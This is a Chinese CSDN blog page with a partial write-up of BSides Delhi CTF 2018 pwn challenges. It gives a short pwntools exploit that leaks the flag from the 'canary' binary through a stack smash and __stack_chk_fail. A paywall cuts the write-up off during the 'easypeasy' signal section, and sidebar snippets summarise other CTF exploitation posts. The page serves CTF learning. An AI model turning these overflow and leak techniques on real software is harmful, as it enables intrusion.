BSides Delhi CTF 2018部分pwn题题解

最新推荐文章于 2024-08-04 22:46:45 发布
最新推荐文章于 2024-08-04 22:46:45 发布
阅读量931 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w12315q/article/details/83684017
版权
本文详细解析了BSides Delhi CTF 2018中的pwn题目,涉及canary、easypeasy和data_bank。在canary题目中,通过覆盖arg参数利用_stackchk_failed泄露flag。easypeasy题目的解决依赖于对Linux信号机制的理解,特别是sigalrm,通过调整信号处理函数实现shell获取。data_bank题目则展示了如何利用未初始化指针的使用不当进行UAF攻击,以及绕过PIE和RELRO保护的方法。
摘要由CSDN通过智能技术生成

本文后部分首发于先知社区

这个是一个比较基础的国际赛,做完之后的感觉就是其中有些题目很有价值,可以顺便补充一些信号机制、uaf使用的知识。

canary

这个题目比较简单,就是一个普通的stack smash并没有什么特别的,这里直接上解题思路了

解题思路

因为开启了canary,而且flag文件是加载到了bss段之中,所以可以利用_stackchk_failed函数进行一个flag的泄漏,泄漏方式就是覆盖arg参数,这个函数就会打印出我们想要的flag了(源码的分析可以参考ctfwiki,这里我就不做过多的分析了)

exp:

    from pwn import*
    p = process('./canary')
    context.log_level="debug"
    flag = 0x06010A0
    p.recv()
    payload = 'a'*0x178 + p64(flag)
    p.sendline(payload)
    p.interactive()

easypeasy

这是一道利用linux下信号机制的题目

linux下信号机制记录

SIGHUP 1 A 终端挂起或者控制进程终止
SIGINT 2 A 键盘中断(如break键被按下)
SIGQUIT 3 C 键盘的退出键被按下
SIGI
最低0.47元/天 解锁文章
Peanuts_CTF
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfpwn目总结
weixin_41038905的博客
11-16 4751
1.安装 pip install pwntools (python2) pip3 install pwntools (python3) 2.使用 Context设置 context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问。一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd
PWNctfpwn题解
Peanuts
11-08 8612
  importantservice 这个目比较简单,保护开的很多多到我怀疑自己是不是把目想的太简单了,结果果然是这么简单的。。 程序功能分析 main函数分析 main函数的功能并不复杂,开头一个dologic函数对v5这个指针进行一个赋值,然后接着让你输入两个数字,是身高和体重,会有一个check乘积不能大(可能怕你太不匀称
ctf pwn
m0_64195960的博客
04-11 1387
2022年3月21栈迁移 这道是栈迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以栈溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的栈迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
[BSidesCF 2019]SVGMagic
2302_79839194的博客
06-03 277
svg标签属性(应该是对图片尺寸的描述) => 保证图片够大,包含全部flag。随便上传一个svg图片 抓包发现有数据格式是svg+xml。这个目说是SVG,环境中告诉我们是将SVG转换成PNG。proc/self/cwd ==> 代表当前路径。svg是基于xml的 => 容易想到xxe注入。
CTFPWN
博客
07-25 589
所需工具 工欲善其事,必先利其器。 IDA Windows下逆向分析工具。 GDB Linux下逆向分析工具。 Python中的pwntools库 参考资料 《程序员的自我修养——链接、装载与库》,俞甲子、石凡、潘爱民 著 ...
[CTF]-PWN:格式化字符串漏洞综合解析
最新发布
2301_79326813的博客
08-04 1031
有格式化字符串漏洞,可以修改printf的got表内地址为system,传参getshell解法一:在32位中可以使用fmtstr_payload直接修改,免去很多麻烦这个没啥好讲的,只是这个函数64位几乎用不了。解法二:在这个方法中没有使用fmtstr_payload函数,虽然麻烦一点,但必须掌握。先回顾一下知识点在32位中,libc函数的真实地址共有32位(8位一个字节),其中前8位对于所有libc函数来说都是相同的,后24位不同。
ctf-2017-release:BSidesSF CTF 2017版本
05-28
2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于HTTP的挑战从...
BSides Noida CTF
06-20
BSides Noida CTF (Capture The Flag) 是一个网络安全领域的活动,通常在印度诺伊达市举办的黑客马拉松和安全竞赛。这类活动旨在增强参与者对网络安全知识的理解,通过各种挑战赛形式,如密码破解、网络漏洞发现、...
PWN-shellcode-WP- (一)目文件.rar
03-29
为几道搜集的真,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真
2015:BSides 温哥华 2015 年 CTF
06-18
yvrctf, bsides 温哥华 2015 比赛时间为太平洋夏令时间 3 月 16 日上午 8:30 至 3 月 17 日晚上 11:45。 感谢所有参加的人。 结果(前 10 名) 地方 队名 分数 1 蒙古人 2700 2 数据新手 2410 3 东京西部片 ...
PWN测试
07-18
信息安全PWN测试目:用于CTF的练习与PWN的学习,测试目。
CTF 一次PWN的小技巧
军火库
08-09 419
行文至此,本次测试也就结束了!文章略长,简单做个总结:在本文中,我们通过使用CTF示例讨论了漏洞利用开发的过程,我们了解了程序如何从argv和argc接收输入的参数。最后,了解了由于较小的随机范围,32位系统中的ASLR为何容易受到攻击,以及如何利用此漏洞进行攻击。
CTF PWN入门
Sakura给爷pwn全场
10-31 416
https://blog.csdn.net/prettyx/article/details/103173220
CTF PWN特点:入门难、进阶难、精通难
IT_huanhuan的博客
05-24 1626
通过第1点中描述,在执行call sum的时候,会将sum 的下一条命令的执行地址0x8048438压入栈中,然后程序进入sum片段进行执行,此时,0x8048438地址就是sum函数的返回地址,即 return address。当执行到ret时,栈空间如下栈地址值0xffffceac0x8048438 # sum的下一条指令0xffffceb01 # a 的值0xffffceb42 # b 的值当执行完ret后,栈空间为。
CTF PWN基础知识(寄存器、栈、汇编指令、标志位)详解
weixin_43780092的博客
09-04 5636
本文详解PWN中基础知识,文中寄存器缩写都有标注上中文含义,方便初学者理解记忆。
CTF总结-PWN
qq_42747131的博客
05-14 6986
一、通用过程 通过file指令查看二进制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解 pwntools 二、缓冲区溢出攻击 寻找可以进行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
CTF PWN 远程payload
Bill
04-05 2764
最近在研究一些pwn类型的.答案中经常出现一些python -c “XXX”|远端的程序.令我十分费解,经过我两个小时的研究,出了一些结果.给大家分享一下. 就拿pwnable.kr的一道的答案举例:python -c “print (‘a’*96+’\x00\xa0\x04\x08’+’\n’+’134514147’)” | ./passcode. 首先这是linux的一条管道命令,前面的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值